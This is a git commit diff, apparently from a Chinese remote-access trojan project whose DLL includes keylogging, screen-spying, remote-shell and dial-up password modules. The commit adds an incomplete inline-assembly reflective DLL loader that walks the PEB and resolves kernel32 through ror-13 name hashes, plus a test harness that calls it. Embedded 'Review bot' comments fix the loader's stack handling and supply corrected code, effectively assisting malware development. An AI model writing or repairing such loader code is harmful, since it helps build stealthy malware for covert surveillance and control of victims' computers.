PEB汇编
This commit is contained in:
parent
d1c3b70e8f
commit
d2afef0ac1
@ -1,28 +1,28 @@
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\pch.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audio.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\until.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\buffer.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\videocap.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\manager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\install.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\strcry.obj
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
|
||||
f:\myapp\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.pch
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\vc141.pdb
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\pch.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audio.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\until.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\keyboardmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\buffer.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\clientsocket.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videomanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\videocap.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\systemmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\shellmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\servermanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenspy.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\screenmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditopt.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\regeditex.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\manager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\kernelmanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\install.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\dialupass.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\audiomanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\filemanager.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\strcry.obj
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.command.1.tlog
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.read.1.tlog
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\release\ccmaindll.tlog\cl.write.1.tlog
|
||||
|
@ -8,14 +8,17 @@ g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4838: 从
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(204): warning C4309: “初始化”: 截断常量值
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\common\login.h(231): warning C4996: 'GetVersionExA': 被声明为已否决
|
||||
g:\windows kits\10\include\10.0.17763.0\um\sysinfoapi.h(378): note: 参见“GetVersionExA”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(50): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(55): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(224): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(229): warning C4996: 'strcpy': This function or variable may be unsafe. Consider using strcpy_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\windows kits\10\include\10.0.17763.0\ucrt\string.h(133): note: 参见“strcpy”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(252): warning C4996: 'fopen': This function or variable may be unsafe. Consider using fopen_s instead. To disable deprecation, use _CRT_SECURE_NO_WARNINGS. See online help for details.
|
||||
g:\windows kits\10\include\10.0.17763.0\ucrt\stdio.h(208): note: 参见“fopen”的声明
|
||||
g:\ccremote\ccremote\ccmaindll\ccmaindll\dllmain.cpp(421): warning C4102: “loc_46327B”: 未引用的标签
|
||||
LINK : warning LNK4044: 无法识别的选项“/Zc:strictStrings”;已忽略
|
||||
正在创建库 ..\..\bin\server\CcMainDll.lib 和对象 ..\..\bin\server\CcMainDll.exp
|
||||
正在生成代码
|
||||
1 of 375 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
|
||||
1 of 380 functions ( 0.3%) were compiled, the rest were copied from previous compilation.
|
||||
0 functions were new in current compilation
|
||||
0 functions had inline decision re-evaluated but remain unchanged
|
||||
已完成代码的生成
|
||||
|
@ -6,7 +6,12 @@
|
||||
#include "common/install.h"
|
||||
#include <stdio.h>
|
||||
#include <shlwapi.h>
|
||||
|
||||
#pragma comment(lib,"shlwapi.lib")
|
||||
#include <iostream>
|
||||
#include <fstream>
|
||||
|
||||
//using namespace std;
|
||||
|
||||
|
||||
struct Connect_Address
|
||||
@ -231,6 +236,84 @@ extern "C" __declspec(dllexport) void TestFun(char* strHost, int nPort)
|
||||
|
||||
|
||||
|
||||
FILE * pFile;
|
||||
|
||||
long lSize;
|
||||
|
||||
char * buffer;
|
||||
|
||||
size_t result;
|
||||
extern "C" __declspec(dllexport) bool InitTestReflectiveLoader()
|
||||
{
|
||||
|
||||
|
||||
// 一个不漏地读入整个文件,只能采用二进制方式打开
|
||||
|
||||
pFile = fopen(".\\..\\..\\bin\\server\\CcMainDll.dll", "rb");
|
||||
|
||||
if (pFile == NULL)
|
||||
|
||||
{
|
||||
|
||||
fputs("File error", stderr);
|
||||
|
||||
printf("open file fail");
|
||||
|
||||
return false;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
// 获取文件大小
|
||||
|
||||
fseek(pFile, 0, SEEK_END);
|
||||
|
||||
lSize = ftell(pFile);
|
||||
|
||||
rewind(pFile);
|
||||
|
||||
|
||||
|
||||
// 分配内存存储整个文件
|
||||
|
||||
buffer = (char*)malloc(sizeof(char)*lSize);
|
||||
|
||||
if (buffer == NULL)
|
||||
|
||||
{
|
||||
|
||||
fputs("Memory error", stderr);
|
||||
|
||||
printf("Memory alloc falil");
|
||||
|
||||
return false;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
// 将文件拷贝到buffer中
|
||||
|
||||
result = fread(buffer, 1, lSize, pFile);
|
||||
|
||||
if (result != lSize)
|
||||
|
||||
{
|
||||
|
||||
fputs("Reading error", stderr);
|
||||
|
||||
printf("Load file to memory falil");
|
||||
|
||||
return false;
|
||||
|
||||
}
|
||||
return true;
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
inline DWORD GetCurrentPositionAddress()
|
||||
{
|
||||
_asm{
|
||||
@ -242,38 +325,60 @@ inline DWORD GetCurrentPositionAddress()
|
||||
}
|
||||
}
|
||||
|
||||
inline DWORD call_ror_0xD()
|
||||
{
|
||||
_asm {
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
mov eax, [ebp + 8]
|
||||
ror eax, 0x0D
|
||||
pop ebp
|
||||
retn
|
||||
}
|
||||
}
|
||||
|
||||
enum LocalEnum
|
||||
{
|
||||
Nop,
|
||||
memAddress,
|
||||
pLoadLibraryA,
|
||||
pGetProcAddress,
|
||||
pVirtualAlloc,
|
||||
pVirtualProtect,
|
||||
pNtFlushInstructionCache,
|
||||
varLocalFindPE
|
||||
memAddress = 4,
|
||||
pLoadLibraryA = 8,
|
||||
pGetProcAddress = 0xC,
|
||||
pVirtualAlloc = 0x10,
|
||||
pVirtualProtect = 0x14,
|
||||
pNtFlushInstructionCache = 0x18,
|
||||
|
||||
varLocalFindPE = 0x1c,
|
||||
varLocalFS30_A = 0x20, // var_8
|
||||
varLocalFS30_B = 0x24, // varLocalFS30_B
|
||||
var_4 = 0x28, // FullDllName
|
||||
BaseDllName = 0x2c, // FullDllName
|
||||
name_hash = 0x30,
|
||||
var_20 = 0x34
|
||||
|
||||
};
|
||||
|
||||
|
||||
|
||||
extern "C" __declspec(dllexport) void ReflectiveLoader()
|
||||
{
|
||||
_asm{
|
||||
push ebp
|
||||
mov ebp, esp
|
||||
sub esp, 0x100
|
||||
sub esp, 0x100 // 抬高堆栈创建局部变量空间
|
||||
mov eax, 4
|
||||
initLocalVar:
|
||||
initLocalVar: // 循环initLocalVar初始化局部变量空间为0
|
||||
mov [ebp + eax], 0
|
||||
inc eax
|
||||
cmp eax ,0x100
|
||||
jnz initLocalVar
|
||||
|
||||
call GetCurrentPositionAddress //获取当前位置地址
|
||||
mov [ebp + memAddress], eax //保存当前代码所在的地址 memAddress
|
||||
call GetCurrentPositionAddress // 获取当前位置地址
|
||||
mov eax, buffer
|
||||
mov [ebp + memAddress], eax // 保存当前代码所在的地址 memAddress
|
||||
|
||||
addressAdd :
|
||||
mov eax, 1
|
||||
test eax, eax //判断eax是否获取到当前地址
|
||||
test eax, eax // 判断eax是否获取到当前地址
|
||||
jz find_success
|
||||
|
||||
mov ecx, [ebp + memAddress] // 查找DOS头
|
||||
@ -285,27 +390,112 @@ extern "C" __declspec(dllexport) void ReflectiveLoader()
|
||||
mov eax, [ebp + memAddress]
|
||||
mov ecx, [eax + 0x3C] // +3C 找到DOS Header e_lfanew
|
||||
mov [ebp + varLocalFindPE], ecx
|
||||
cmp [ebp + varLocalFindPE], 0x40
|
||||
cmp dword ptr[ebp + varLocalFindPE], 0x40
|
||||
jb noFindFlag // 地址address - 1
|
||||
cmp [ebp + varLocalFindPE], 0x400
|
||||
jnb noFindFlag //; 地址address - 1
|
||||
cmp dword ptr[ebp + varLocalFindPE], 0x400
|
||||
jnb noFindFlag // 地址address - 1
|
||||
|
||||
mov edx, [ebp + varLocalFindPE]
|
||||
add edx, [ebp + memAddress]
|
||||
mov [ebp + varLocalFindPE], edx
|
||||
mov eax, [ebp + varLocalFindPE]
|
||||
cmp dword ptr[eax], 0x4550 //; 判断PE Header Signature PE标志
|
||||
jnz noFindFlag //; 地址address - 1
|
||||
cmp dword ptr[eax], 0x4550 // 判断PE Header Signature PE标志
|
||||
jnz noFindFlag // 地址address - 1
|
||||
jmp find_success // 找到了singtrue 跳转
|
||||
|
||||
noFindFlag :
|
||||
noFindFlag :
|
||||
mov ecx, [ebp + memAddress]; 地址address - 1
|
||||
sub ecx, 1
|
||||
mov [ebp + memAddress], ecx
|
||||
jmp addressAdd
|
||||
|
||||
find_success:
|
||||
mov edx, fs:[0x30] // 获取PEB结构地址
|
||||
mov [ebp + varLocalFS30_A], edx
|
||||
mov eax, [ebp + varLocalFS30_A]
|
||||
mov ecx, [eax + 0x0C] // 获取Ptr32 _PEB_LDR_DATA 进程加载模块链表(Ldr)
|
||||
mov [ebp + varLocalFS30_A], ecx
|
||||
mov edx, [ebp + varLocalFS30_A]
|
||||
mov eax, [edx + 0x14] // 获取结构中InMemoryOrderModuleList 顺序模块列表
|
||||
mov [ebp + varLocalFS30_B], eax
|
||||
|
||||
loc_46327B:
|
||||
cmp [ebp + varLocalFS30_B], 0
|
||||
jz find_moudle_null
|
||||
mov ecx, [ebp + varLocalFS30_B]
|
||||
mov edx, [ecx + 0x28] // FullDllName_buff 模块名称
|
||||
mov [ebp + BaseDllName], edx
|
||||
mov eax, [ebp + varLocalFS30_B]
|
||||
mov cx, [eax + 0x24] // UNICODE_STRING FullDllName Length
|
||||
mov [ebp + var_4], cx // var_4保存FullDllName字符串长度
|
||||
mov [ebp + name_hash], 0
|
||||
|
||||
calc_hash:
|
||||
mov edx, [ebp + name_hash]
|
||||
push edx
|
||||
call call_ror_0xD
|
||||
add esp, 4
|
||||
mov [ebp + name_hash], eax // ror后的eax为返回值
|
||||
mov eax, [ebp + BaseDllName]
|
||||
movzx ecx, byte ptr[eax]
|
||||
cmp ecx, 0x61 // 判断获取到的模块字符串的指定位置,小于跳转,地址 + 1,比对下一个字母
|
||||
jl less_flage
|
||||
mov edx, [ebp + BaseDllName] // 获取名称byte
|
||||
movzx eax, byte ptr[edx] // eax = byte
|
||||
mov ecx, [ebp + name_hash] // 计算值
|
||||
lea edx, [ecx + eax - 0x20] // hash + FullDllName[index] - 0x20
|
||||
mov [ebp + name_hash], edx // 得到结果
|
||||
jmp calc_end
|
||||
|
||||
less_flage:
|
||||
add ecx, [ebp + name_hash]
|
||||
mov[ebp + name_hash], ecx
|
||||
|
||||
calc_end:
|
||||
mov edx, [ebp + BaseDllName] // 名称地址 + 1
|
||||
add edx, 1
|
||||
mov [ebp + BaseDllName], edx
|
||||
mov ax, [ebp + var_4] // 字符串名称长度 - 1
|
||||
sub ax, 1
|
||||
mov [ebp + var_4], ax
|
||||
movzx ecx, [ebp + var_4]
|
||||
test ecx, ecx // 判断长度是否为0,没有为0继续计算hash
|
||||
jnz calc_hash // 计算简单的模块名称name_hash
|
||||
|
||||
cmp [ebp + name_hash], 0x6A4ABC5B // 6A4ABC5B = Kernel32
|
||||
jnz no_Kernel32_hash // 3CFA685D = ntdll
|
||||
mov edx, [ebp + varLocalFS30_B] // 获取结构中InMemoryOrderModuleList
|
||||
mov eax, [edx + 0x10]
|
||||
mov [ebp + varLocalFS30_A], eax // +10偏移获取DllBase基址
|
||||
mov ecx, [ebp + varLocalFS30_A]
|
||||
mov edx, [ebp + varLocalFS30_A]
|
||||
add edx, [ecx + 0x3C] // 获取PE IMAGE_DOS_HRADER e_lfanew
|
||||
mov [ebp + var_20], edx
|
||||
mov eax, 8
|
||||
imul ecx, eax, 0 // imul 1, 2, 3 2 3乘积保存到1
|
||||
mov edx, [ebp + var_20]
|
||||
lea eax, [edx + ecx + 0x78] // 获取IMAGE_OPTIONAL_HEADER -> IMAGE_DATA_DIRECTORY[0] EXPORT 导出表
|
||||
mov [ebp + exp_AddressOfNames], eax
|
||||
mov ecx, [ebp + exp_AddressOfNames]
|
||||
mov edx, [ebp + varLocalFS30_A] // edx = 基地址
|
||||
add edx, [ecx] // 基地址 + 导出表地址
|
||||
mov [ebp + var_20], edx
|
||||
mov eax, [ebp + var_20]
|
||||
mov ecx, [ebp + varLocalFS30_A]
|
||||
add ecx, [eax + 0x20] // 获取 IMAGE_EXPORT_DIRECTORY +0x20 AddressOfNames
|
||||
mov [ebp + exp_AddressOfNames], ecx
|
||||
mov edx, [ebp + var_20]
|
||||
mov eax, [ebp + varLocalFS30_A]
|
||||
add eax, [edx + 0x24] // 获取 IMAGE_EXPORT_DIRECTORY +0x24 AddressOfNameOrdinals
|
||||
mov [ebp + AddressOfNameOrdinals], eax
|
||||
mov ecx, 4
|
||||
mov [ebp + var_4], cx
|
||||
|
||||
|
||||
find_success:
|
||||
|
||||
|
||||
find_moudle_null:
|
||||
|
||||
|
||||
}
|
||||
|
||||
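Review bot: `ReflectiveLoader` reserves its local area with `sub esp, 0x100` below ebp but then addresses every slot at a positive offset — the init loop stores to `[ebp + eax]` for eax = 4..0xFF, and `memAddress = 4`, `varLocalFindPE = 0x1c`, `name_hash = 0x30` etc. from `LocalEnum` are read and written as `[ebp + const]` — so those stores land on the saved frame pointer, the return address and the caller's frame instead of the reserved 0x100 bytes, and `mov [ebp + memAddress], eax` right after `mov eax, buffer` plants the heap pointer in that area. That is stack corruption on every call, independent of any input, and will surface as a return to a garbage address. The fix is to make the `LocalEnum` offsets negative (`memAddress = -4` … `var_20 = -0x34`, adding the `exp_AddressOfNames` and `AddressOfNameOrdinals` slots the tail of the block uses but the enum, as shown in this hunk, never declares), walk the zero loop over `[ebp-0x100, ebp)` with an explicit operand size, and tear the pushed frame down (`mov esp, ebp` / `pop ebp`) before the compiler's own epilogue runs — as written the block reaches `find_moudle_null:` and falls off the end of the asm with its frame still on the stack. If the trailing `find_success:` near the end of the block is still present on the new side, it also duplicates the label defined after the PE-header search and will not assemble.
```cpp
        sub esp, 0x100                      // local area lives *below* ebp
        mov eax, -0x100
    initLocalVar:                           // zero [ebp-0x100, ebp), never above ebp
        mov byte ptr [ebp + eax], 0
        inc eax
        test eax, eax
        jnz initLocalVar
        // … unchanged: PE header search, PEB/Ldr walk, name hash, export lookup (all slots now negative offsets) …
    find_moudle_null:
        mov esp, ebp                        // undo the frame pushed at entry
        pop ebp
```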
|
@ -1 +1 @@
|
||||
f:\myapp\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
|
||||
g:\ccremote\ccremote\ccmaindll\testloaddll\..\..\bin\server\testloaddll.exe
|
||||
|
@ -1,6 +1,6 @@
|
||||
C:\Program Files (x86)\Microsoft Visual Studio\2017\Professional\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
|
||||
G:\VS2017\Common7\IDE\VC\VCTargets\Microsoft.CppBuild.targets(377,5): warning MSB8004: Output 目录未以斜杠结尾。 此生成实例将添加斜杠,因为必须有这个斜杠才能正确计算 Output 目录。
|
||||
TestLoadDll.cpp
|
||||
正在生成代码
|
||||
All 171 functions were compiled because no usable IPDB/IOBJ from previous compilation was found.
|
||||
已完成代码的生成
|
||||
TestLoadDll.vcxproj -> F:\myapp\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
|
||||
TestLoadDll.vcxproj -> G:\CcRemote\CcRemote\CcMainDll\TestLoadDll\..\..\bin\server\TestLoadDll.exe
|
||||
|
@ -1,2 +1,2 @@
|
||||
#TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.17763.0
|
||||
Release|Win32|F:\myapp\CcRemote\CcMainDll\|
|
||||
Release|Win32|G:\CcRemote\CcRemote\CcMainDll\|
|
||||
|
@ -11,6 +11,16 @@ int main()
|
||||
//载入服务端dll hijack test
|
||||
HMODULE hServerDll = LoadLibrary(".\\..\\..\\bin\\server\\CcMainDll.dll");
|
||||
|
||||
typedef int(_cdecl *TestRunInit)();
|
||||
|
||||
TestRunInit InitTestReflectiveLoader = (TestRunInit)GetProcAddress(hServerDll, "InitTestReflectiveLoader");
|
||||
|
||||
if (InitTestReflectiveLoader != NULL)
|
||||
{
|
||||
InitTestReflectiveLoader(); //调用这个函数
|
||||
}
|
||||
|
||||
|
||||
//声明导出函数类型--导出的TestRun函数
|
||||
typedef void(_cdecl *TestRunT)();
|
||||
//寻找dll中导出函数
|
||||
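Review bot: The `bool` returned by `InitTestReflectiveLoader()` is discarded inside the `if`, and `hServerDll` from `LoadLibrary` reaches `GetProcAddress` with no NULL check, so a missing or unloadable `CcMainDll.dll` or an unreadable file is reported only by the DLL's own `printf` and `main` continues into the code after this hunk with nothing loaded. The export is declared `bool InitTestReflectiveLoader()` in dllmain.cpp, so the typedef `int(_cdecl *TestRunInit)()` also mismatches the real return type (`bool` comes back in `al`; reading it as `int` takes whatever is in the rest of `eax`). Guard the module right after loading, `if (hServerDll == NULL) return 1;`, declare the pointer as `typedef bool(__cdecl *TestRunInit)();`, and gate the rest of `main` on the result: `if (InitTestReflectiveLoader == NULL || !InitTestReflectiveLoader()) return 1;`. The body of `main` continues outside this hunk.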
|